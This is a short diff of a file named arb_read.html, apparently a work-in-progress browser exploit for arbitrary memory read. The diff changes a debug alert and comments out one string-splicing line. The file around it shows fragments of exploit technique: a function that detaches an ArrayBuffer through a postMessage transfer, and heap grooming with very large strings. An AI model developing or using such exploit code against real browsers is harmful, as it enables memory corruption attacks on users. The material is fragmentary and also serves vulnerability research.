--- a/arb_read.html
+++ b/arb_read.html
@@ -1,6 +1,6 @@
 <script>
 
-alert("start6");
+alert("start5");
 function neuter(ab) {
 
     postMessage("", "*", [ab]);
@@ -60,7 +60,7 @@ x = createStringWithRepeatedChar(x, 1 << 16);
 
 x+="1";
 
-y=tmpy+y.substring(0,y.length-0x50);
+//y=tmpy+y.substring(0,y.length-0x50);
 
 x.substring(0,5);
 mystr.substring(0,5);
